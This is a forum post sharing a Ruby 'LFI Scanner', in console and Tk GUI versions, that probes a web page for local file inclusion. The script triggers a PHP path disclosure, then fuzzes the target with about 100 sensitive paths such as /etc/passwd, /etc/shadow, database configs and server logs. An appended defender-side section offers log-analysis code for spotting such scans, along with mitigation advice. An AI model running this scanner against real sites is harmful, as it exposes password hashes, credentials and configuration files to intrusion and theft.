[Ruby] LFI Scanner 0.3

Posted by BigBear on August 21, 2015, 06:39:32 pm

A simple Ruby script to scan a page for the LFI vulnerability.

Console version:

Code: Ruby
#!/usr/bin/ruby
# LFI Scanner 0.3
# (C) Doddy Hackman 2015

require "open-uri"
require "net/http"

# Functions

# Fetch a page with a browser-like User-Agent; returns "Error" on any failure.
def toma(web)
   begin
      # URI.open is needed on current Ruby; Kernel#open no longer fetches URLs
      return URI.open(web, "User-Agent" => "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/25.0").read
   rescue
      return "Error"
   end
end

# Print the usage line
def uso
   print "\n[+] Sintax : ruby lfi.rb <page>\n"
end

# Print the banner
def head
   print "\n\n-- == LFI Scanner 0.3 == --\n\n"
end

# Print the footer and exit
def copyright
   print "\n\n-- == (C) Doddy Hackman 2015 == --\n\n"
   exit(1)
end

def scan(web)
   # Paths appended to the target URL, one request per entry
   files = ['c:/xampp/here.php','../../../boot.ini','../../../../boot.ini','../../../../../boot.ini',
      '../../../../../../boot.ini','/etc/passwd','/etc/shadow','/etc/shadow~','/etc/hosts','/etc/motd',
      '/etc/apache/apache.conf','/etc/fstab','/etc/apache2/apache2.conf','/etc/apache/httpd.conf',
      '/etc/httpd/conf/httpd.conf','/etc/apache2/httpd.conf','/etc/apache2/sites-available/default',
      '/etc/mysql/my.cnf','/etc/my.cnf','/etc/sysconfig/network-scripts/ifcfg-eth0','/etc/redhat-release',
      '/etc/httpd/conf.d/php.conf','/etc/pam.d/proftpd','/etc/phpmyadmin/config.inc.php','/var/www/config.php',
      '/etc/httpd/logs/error_log','/etc/httpd/logs/error.log','/etc/httpd/logs/access_log','/etc/httpd/logs/access.log',
      '/var/log/apache/error_log','/var/log/apache/error.log','/var/log/apache/access_log','/var/log/apache/access.log',
      '/var/log/apache2/error_log','/var/log/apache2/error.log','/var/log/apache2/access_log','/var/log/apache2/access.log',
      '/var/www/logs/error_log','/var/www/logs/error.log','/var/www/logs/access_log','/var/www/logs/access.log',
      '/usr/local/apache/logs/error_log','/usr/local/apache/logs/error.log','/usr/local/apache/logs/access_log',
      '/usr/local/apache/logs/access.log','/var/log/error_log','/var/log/error.log','/var/log/access_log',
      '/var/log/access.log','/etc/group','/etc/security/group','/etc/security/passwd','/etc/security/user',
      '/etc/security/environ','/etc/security/limits','/usr/lib/security/mkuser.default','/apache/logs/access.log',
      '/apache/logs/error.log','/etc/httpd/logs/acces_log','/etc/httpd/logs/acces.log','/var/log/httpd/access_log',
      '/var/log/httpd/error_log','/apache2/logs/error.log','/apache2/logs/access.log','/logs/error.log',
      '/logs/access.log','/usr/local/apache2/logs/access_log','/usr/local/apache2/logs/access.log',
      '/usr/local/apache2/logs/error_log','/usr/local/apache2/logs/error.log','/var/log/httpd/access.log',
      '/var/log/httpd/error.log','/opt/lampp/logs/access_log','/opt/lampp/logs/error_log','/opt/xampp/logs/access_log',
      '/opt/xampp/logs/error_log','/opt/lampp/logs/access.log','/opt/lampp/logs/error.log','/opt/xampp/logs/access.log',
      '/opt/xampp/logs/error.log','C:\ProgramFiles\ApacheGroup\Apache\logs\access.log',
      'C:\ProgramFiles\ApacheGroup\Apache\logs\error.log','/usr/local/apache/conf/httpd.conf',
      '/usr/local/apache2/conf/httpd.conf','/etc/apache/conf/httpd.conf','/usr/local/etc/apache/conf/httpd.conf',
      '/usr/local/apache/httpd.conf','/usr/local/apache2/httpd.conf','/usr/local/httpd/conf/httpd.conf',
      '/usr/local/etc/apache2/conf/httpd.conf','/usr/local/etc/httpd/conf/httpd.conf','/usr/apache2/conf/httpd.conf',
      '/usr/apache/conf/httpd.conf','/usr/local/apps/apache2/conf/httpd.conf','/usr/local/apps/apache/conf/httpd.conf',
      '/etc/apache2/conf/httpd.conf','/etc/http/conf/httpd.conf','/etc/httpd/httpd.conf','/etc/http/httpd.conf',
      '/etc/httpd.conf','/opt/apache/conf/httpd.conf','/opt/apache2/conf/httpd.conf','/var/www/conf/httpd.conf',
      '/private/etc/httpd/httpd.conf','/private/etc/httpd/httpd.conf.default',
      '/Volumes/webBackup/opt/apache2/conf/httpd.conf','/Volumes/webBackup/private/etc/httpd/httpd.conf',
      '/Volumes/webBackup/private/etc']
   print "\n[+] Testing the vulnerability LFI...\n\n"
   # A trailing quote makes the include fail; the PHP warning leaks the full path
   code = toma(web+"'")
   if code=~/No such file or directory in <b>(.*)<\/b> on line/
      fpd = $1
      print "[+] LFI Detected\n\n"
      print "[Full Path Discloure]: "+fpd+"\n"
      print "\n[+] Fuzzing Files\n\n"
      files.each do |file|
         code = toma(web+file)
         # Skip failed requests; "Error" would otherwise be reported as a hit
         if code != "Error" and not code=~/No such file or directory in/
            print "[Link] : "+web+file+"\n"
         end
      end
      print "\n[+] Finish\n"
      copyright()
   else
      print "[-] Not Vulnerable to LFI\n\n"
   end
end

#

page = ARGV[0]

head()

if !page
   uso()
else
   scan(page)
end

copyright()

#The End ?

Tk version:

Code: Ruby
#!/usr/bin/ruby
# LFI Scanner 0.3
# (C) Doddy Hackman 2015

require "tk"
require "net/http"
require "open-uri"

# Functions

# Fetch a page with a browser-like User-Agent; returns "Error" on any failure.
def toma(web)
   begin
      # URI.open is needed on current Ruby; Kernel#open no longer fetches URLs
      return URI.open(web, "User-Agent" => "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/25.0").read
   rescue
      return "Error"
   end
end

#

window = TkRoot.new { title "LFI Scanner 0.3 (C) Doddy Hackman 2015" ; background "black" }
window['geometry'] = '300x300-20+10'

TkLabel.new(window) do
   background "black"
   foreground "cyan"
   text "    Target : "
   place('relx'=>"0.1",'rely'=>"0.1")
end

web = TkEntry.new(window){
   background "black"
   foreground "cyan"
   width 25
   place('relx'=>0.3,'rely'=>0.1)
}

TkLabel.new(window) do
   background "black"
   foreground "cyan"
   text "Console"
   place('relx'=>0.4,'rely'=>0.2)
end

console = TkText.new(window) do
   background "black"
   foreground "cyan"
   width 30
   height 10
   place('relx'=>0.1,'rely'=>0.3)
end

TkButton.new(window) do
   text "Search"
   background "black"
   foreground "cyan"
   width 17
   activebackground "cyan"
   highlightbackground  "cyan"
   command proc{
      # Read the entry into its own variable so the widget survives repeated clicks
      target = web.value.to_s
      # Paths appended to the target URL, one request per entry
      files = ['c:/xampp/here.php','../../../boot.ini','../../../../boot.ini','../../../../../boot.ini',
         '../../../../../../boot.ini','/etc/passwd','/etc/shadow','/etc/shadow~','/etc/hosts','/etc/motd',
         '/etc/apache/apache.conf','/etc/fstab','/etc/apache2/apache2.conf','/etc/apache/httpd.conf',
         '/etc/httpd/conf/httpd.conf','/etc/apache2/httpd.conf','/etc/apache2/sites-available/default',
         '/etc/mysql/my.cnf','/etc/my.cnf','/etc/sysconfig/network-scripts/ifcfg-eth0','/etc/redhat-release',
         '/etc/httpd/conf.d/php.conf','/etc/pam.d/proftpd','/etc/phpmyadmin/config.inc.php','/var/www/config.php',
         '/etc/httpd/logs/error_log','/etc/httpd/logs/error.log','/etc/httpd/logs/access_log','/etc/httpd/logs/access.log',
         '/var/log/apache/error_log','/var/log/apache/error.log','/var/log/apache/access_log','/var/log/apache/access.log',
         '/var/log/apache2/error_log','/var/log/apache2/error.log','/var/log/apache2/access_log','/var/log/apache2/access.log',
         '/var/www/logs/error_log','/var/www/logs/error.log','/var/www/logs/access_log','/var/www/logs/access.log',
         '/usr/local/apache/logs/error_log','/usr/local/apache/logs/error.log','/usr/local/apache/logs/access_log',
         '/usr/local/apache/logs/access.log','/var/log/error_log','/var/log/error.log','/var/log/access_log',
         '/var/log/access.log','/etc/group','/etc/security/group','/etc/security/passwd','/etc/security/user',
         '/etc/security/environ','/etc/security/limits','/usr/lib/security/mkuser.default','/apache/logs/access.log',
         '/apache/logs/error.log','/etc/httpd/logs/acces_log','/etc/httpd/logs/acces.log','/var/log/httpd/access_log',
         '/var/log/httpd/error_log','/apache2/logs/error.log','/apache2/logs/access.log','/logs/error.log',
         '/logs/access.log','/usr/local/apache2/logs/access_log','/usr/local/apache2/logs/access.log',
         '/usr/local/apache2/logs/error_log','/usr/local/apache2/logs/error.log','/var/log/httpd/access.log',
         '/var/log/httpd/error.log','/opt/lampp/logs/access_log','/opt/lampp/logs/error_log','/opt/xampp/logs/access_log',
         '/opt/xampp/logs/error_log','/opt/lampp/logs/access.log','/opt/lampp/logs/error.log','/opt/xampp/logs/access.log',
         '/opt/xampp/logs/error.log','C:\ProgramFiles\ApacheGroup\Apache\logs\access.log',
         'C:\ProgramFiles\ApacheGroup\Apache\logs\error.log','/usr/local/apache/conf/httpd.conf',
         '/usr/local/apache2/conf/httpd.conf','/etc/apache/conf/httpd.conf','/usr/local/etc/apache/conf/httpd.conf',
         '/usr/local/apache/httpd.conf','/usr/local/apache2/httpd.conf','/usr/local/httpd/conf/httpd.conf',
         '/usr/local/etc/apache2/conf/httpd.conf','/usr/local/etc/httpd/conf/httpd.conf','/usr/apache2/conf/httpd.conf',
         '/usr/apache/conf/httpd.conf','/usr/local/apps/apache2/conf/httpd.conf','/usr/local/apps/apache/conf/httpd.conf',
         '/etc/apache2/conf/httpd.conf','/etc/http/conf/httpd.conf','/etc/httpd/httpd.conf','/etc/http/httpd.conf',
         '/etc/httpd.conf','/opt/apache/conf/httpd.conf','/opt/apache2/conf/httpd.conf','/var/www/conf/httpd.conf',
         '/private/etc/httpd/httpd.conf','/private/etc/httpd/httpd.conf.default',
         '/Volumes/webBackup/opt/apache2/conf/httpd.conf','/Volumes/webBackup/private/etc/httpd/httpd.conf',
         '/Volumes/webBackup/private/etc']
      console.insert("end", "[+] Testing the vulnerability LFI...\n\n")
      # A trailing quote makes the include fail; the PHP warning leaks the full path
      code = toma(target+"'")
      if code=~/No such file or directory in <b>(.*)<\/b> on line/
         fpd = $1
         console.insert("end","[+] LFI Detected\n\n")
         console.insert("end","[Full Path Discloure]: "+fpd+"\n")
         console.insert("end","\n[+] Fuzzing Files\n\n")
         files.each do |file|
            code = toma(target+file)
            # Skip failed requests; "Error" would otherwise be reported as a hit
            if code != "Error" and not code=~/No such file or directory in/
               console.insert("end","[Link] : "+target+file+"\n")
            end
         end
         console.insert("end","\n[+] Finish")
      else
         console.insert("end","[-] Not Vulnerable to LFI")
      end
   }
   place('relx'=>0.3,'rely'=>0.9)
end

Tk.mainloop

#The End ?

That's all.
« Last edit: August 21, 2015, 10:00:31 pm by EPSILON »
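
A defender-side view of the scanner above, as an added example that is not part of the original post: it flags clients in a web access log whose requests show the two behaviours the script produces, a query string ending in a bare quote (its probe) and parameter values carrying traversal sequences or absolute system paths (its file fuzzing). The log lines are constructed samples, and the names `lfi_signals`, `flag_clients`, the path patterns and the `min_hits` threshold are assumptions to tune per site.

```ruby
require "uri"

# Constructed sample lines in Apache combined log format (not real traffic).
SAMPLE_LOG = <<~'LOG'
  203.0.113.7 - - [21/Aug/2015:18:40:01 +0000] "GET /index.php?page=' HTTP/1.1" 200 512 "-" "Mozilla/5.0"
  203.0.113.7 - - [21/Aug/2015:18:40:02 +0000] "GET /index.php?page=/etc/passwd HTTP/1.1" 200 1204 "-" "Mozilla/5.0"
  203.0.113.7 - - [21/Aug/2015:18:40:02 +0000] "GET /index.php?page=..%2F..%2F..%2Fboot.ini HTTP/1.1" 200 498 "-" "Mozilla/5.0"
  203.0.113.7 - - [21/Aug/2015:18:40:03 +0000] "GET /index.php?page=/var/log/apache2/access.log HTTP/1.1" 200 498 "-" "Mozilla/5.0"
  198.51.100.20 - - [21/Aug/2015:18:41:10 +0000] "GET /index.php?page=contact HTTP/1.1" 200 2301 "-" "Mozilla/5.0"
  198.51.100.20 - - [21/Aug/2015:18:41:15 +0000] "GET /search.php?q=o'brien HTTP/1.1" 200 1822 "-" "Mozilla/5.0"
LOG

LINE_RE   = /\A(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST|HEAD) (\S+) [^"]*" (\d{3})/
TRAVERSAL = %r{(?:\A|[/\\])\.\.(?:[/\\]|\z)}
SENSITIVE = %r{\A(?:/etc/|/var/log/|/proc/|/usr/local/apache|/opt/(?:lampp|xampp)/|[a-z]:[/\\])}i

# Percent-decode a parameter value; keep it raw when the encoding is malformed.
def decode(s)
  URI.decode_www_form_component(s)
rescue ArgumentError
  s
end

# Return the signals found in one request target ("/path?query").
def lfi_signals(target)
  _path, query = target.split("?", 2)
  return [] if query.nil?
  signals = query.end_with?("'", "%27") ? [:quote_probe] : []
  query.split("&").each do |pair|
    value = decode(pair.split("=", 2)[1].to_s)
    signals << :traversal if value.match?(TRAVERSAL)
    signals << :sensitive_path if value.match?(SENSITIVE)
  end
  signals.uniq
end

# Group suspicious requests per client; flag clients with at least min_hits of them.
def flag_clients(log, min_hits: 3)
  hits = Hash.new { |h, k| h[k] = [] }
  log.each_line do |line|
    next unless (m = LINE_RE.match(line))
    sig = lfi_signals(m[2])
    hits[m[1]] << sig unless sig.empty?
  end
  hits.select { |_ip, sigs| sigs.size >= min_hits }
      .transform_values { |sigs| sigs.flatten.uniq.sort }
end

p flag_clients(SAMPLE_LOG) if __FILE__ == $PROGRAM_NAME
```

The script's detection step depends on the PHP warning text being returned in the response body, so disabling `display_errors` in production and resolving include parameters against an allow-list removes both the signal it looks for and the underlying flaw.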

 
